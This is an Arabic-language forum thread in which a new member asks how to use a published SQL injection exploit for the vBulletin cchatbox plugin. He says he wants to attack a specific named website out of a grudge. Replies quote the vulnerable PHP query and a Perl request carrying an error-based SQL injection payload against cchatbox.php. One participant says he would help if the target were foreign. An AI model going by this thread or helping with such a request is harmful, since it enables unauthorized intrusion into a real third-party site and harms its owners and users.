ممكن مساعده ؟ Web Applications

السلام عليكم ورحمه الله و بركاته
انا عضو جديد لديكم بالمنتدى
و
انا امبارح و انا بشوف مواقع السكيورتى لقيت هذه الثغره
توجد بشات منتديات كثيره تستخدمه
وهو لغه perl وانا فتحته عن طريق الدوس وشوفت الثغره وطريقه تطبيقها فلم افهم شئ
ممكن يا شباب تفهمونى ؟
وهذا ما ظهر لى بالدوس

 ##################################
############ EXPLOIT #############
##################################
## Portal: cchatbox             ##
## Bug: SQLI                    ##
## Author: DSecurity            ##
## Coder: vv0lll                ##
##################################
Use: exploit.pl address number_user sleeptime
Example: exploit.pl http://localhost/vbb 10 10

و رابط الثغره فى موقع السيكيورتى http://www.exploit-db.com/exploits/16268/
واتمنى بجد االافاده

Verified:

ضع أمثلة من مواقع مركبة هذه لإضافة

            $vbulletin->input->clean_array_gpc('p', array(
                    'messageid' => TYPE_UNIT,
                     'message' => TYPE_STR,
                    ));
            
             $idmessage = $vbulletin->GPC['messageid'];
             $useridmessage = $db->query_first("SELECT userid FROM " . TABLE_PREFIX . "cchatbox_message WHERE id = $idmessage;");
            
             require_once(DIR . '/includes/functions_newpost.php');
             $message = convert_url_to_bbcode(addslashes(convert_urlencoded_unicode($vbulletin->GPC['message'])));
            
             $db->query_write("UPDATE " . TABLE_PREFIX . "cchatbox_message SET message = '" . $db->escape_string($message) . "' WHERE id = $idmessage;");
            
             exit;
             } 

انا عايز اجرب على هذا الموقع :slight_smile: بس يا ريت لا تخترقه اجعلنى انا اخترقه :)) لانى مستهدفه http://www.wtarabia.com/

http://www.wtarabia.com/vb/misc.php?do=cchatbox

اتمنى المساعده

http://www.wtarabia.com/vb/cchatbox.php
Not Found

هذا هو
http://www.wtarabia.com/vb/misc.php?do=cchatbox

يبرنس اللحلو :slight_smile:
شوف ها الكلام هون

# Create a request    my $req = HTTP::Request->new(POST => $ARGV[0].'/cchatbox.php');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');

شوف
my $req = HTTP::Request->new(POST => $ARGV[0].‘/cchatbox.php’);و الهاك فى المرافقة إلى قالو فيه ثغرة :slight_smile:

وكيف مستهدفو ؟؟؟؟ :confused:

åÇß ÕäÏæÞ ÇáãÍÇÏËÇÊ cChatBox - AJAX 1.5 .zip (25.3 KB)

ده ملف .php بس انا عارف ان لا يوجد هاك cchatbox.php و .php
ومستهدف الموقع لانهم عاملونى سيئأ :frowning:

حتى لو احد الادارين شافه ماضن يساعدك ﻻنه عربي 1000%

لو اجنبي على عيني وراسي اول المساعدين انا مع ان اخي ياسين وضح لك كل شي